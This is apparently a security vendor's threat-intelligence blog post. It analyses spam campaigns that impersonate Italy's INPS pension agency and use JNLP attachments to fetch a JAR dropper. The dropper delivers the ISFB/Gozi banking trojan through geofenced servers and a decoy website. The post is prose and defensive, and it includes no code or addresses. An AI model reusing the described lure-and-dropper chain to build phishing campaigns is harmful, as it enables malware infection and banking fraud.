Forcepoint X-Labs have recently been monitoring emerging malware distribution campaigns that utilize the Java platform. Java downloaders have been a known threat for quite a while, yet there is at least one unexplored feature of the platform that helps to automate malware download and execution. The Java Network Launch Protocol (JNLP) was intended to be a simple mechanism for starting remote Java applications by double clicking on the equivalent of a Windows Link file. It is currently being leveraged as a novel way to auto-execute malicious Java files.
What is Java Web Start?
Java Web Start or Java Network Launch Protocol - as programmers often refer to it - is a protocol using the XML markup language. It was designed for the sole purpose of automatically starting Java applications from a remote location. For that to work the JNLP file must contain a host address and path of the target Java application package (JAR) to be downloaded and executed. Once the user double clicks on a JNLP file, Java would attempt to reach out to the host described in the XML structure, download the specified JAR package and, if successful, execute it. The only prerequisite is the existence of the Java Runtime Environment (JRE) on the local PC.
Side note: If you are unsure whether you have Java installed on your machine, you can perform a quick check as per this guide.
If you do, it might be worth flagging to your IT team. We have been warning of the vulnerable nature of Java since at least 2013.
It is rather obvious that this functionality provides an appealing opportunity for automating the download and execution of a malicious file.
The Italian Job
Malicious spam campaigns utilizing a JNLP attachment - either as-is, or inside a ZIP archive - started to appear in recent weeks. The messages seem to be coming from the INPS (Istituto Nazionale della Previdenza Sociale) which is the main entity of Italy's public retirement system. Interestingly enough, the INPS website was subject to attack in early 2020 as Italian citizens started to apply for benefits; but this time their name is being used as a lure, such is the organization’s relevance.
It is encouraging people to have a look at their balance and claim a refund by opening the attachment. The logo of INPS is included, however taking a closer look at the sender address, the clumsily written message body, and the attachment, make it easy to see that it is suspicious. Opening the JNLP attachment in a text editor clearly reveals the first stage C2 address.
Visiting the remote location from anywhere but an Italian IP address will result in the server ignoring the request. Considering the exclusively Italian message body along with the .it destination email address indicates the use of geofencing. Whilst visiting the C2 address from the right location results in the download of a small JAR application around 6kb in size. Upon further inspection, this JAR package contains only one Java Class, which is unusual for a benign Java application. Decompilation of the Java bytecode results in a short piece of source code, with yet another suspicious looking remote location and the official website of the INPS. The latter one acting as a decoy, it would be opened in a browser while "nazionale.jpg" is being silently downloaded and executed in the background.
The second stage C2 contains the final payload in the chain and is also geofenced. Successful download of the "nazionale.jpg" file will only occur if it was requested from an accepted geolocation. Note that in certain cases the content of the "nazionale.jpg" file was later replaced by a benign PuTTY telnet client application before the C2 would become unresponsive - likely the result of a takedown operation.
The binaries we’ve been seeing deployed on the second stage C2 were two of a kind so far. Either an NSIS archive with only one embedded file inside, which would be loaded directly into memory and executed by the NSIS script, or a small executable with a custom exepacker on top of it. The commonality between them is the distribution of one of the popular banking trojans, ISFB IAP, a well-known Gozi fork.
Small scale campaigns
There have been only a handful of small-scale campaigns where JNLP files were utilized, with less than a thousand email messages for each, and their attributes changing frequently. The email attachments were quickly altered for the INPS themed emails, instead of JNLP they were reverting back to documents with Excel 4.0 macros within a couple of days. In June Trustwave noted a COVID-19 themed lure pushing TrickBot. We observed yet another completely different JNLP based campaign pushing the NetWire RAT recently. These frequent changes are just reflections of the common TTPs used by threat actors behind these campaigns.
Having autostart functionality in popular applications or platforms doesn't necessarily mean they are safe to use or were created with security in mind. Most likely they just haven't been explored and exploited by cybercriminals yet. The Web Start feature of Java is a perfect example that showcases this technique, and has been waiting silently to be revisited by cybercriminals many years after its first malicious use in 2013. Organizations - unless they heavily rely on it - are advised to block JNLP file attachments at the gateway level to prevent unwanted execution along with its consequences.
Forcepoint customers are protected against this threat at the following stages of attack:
- Stage 2 (Lure) – Malicious emails associated with these attacks are identified and blocked.
- Stage 5 (Dropper File) – Malicious files are prevented from being downloaded.
- Stage 6 (Call Home) – Attempts to contact C2 servers are blocked.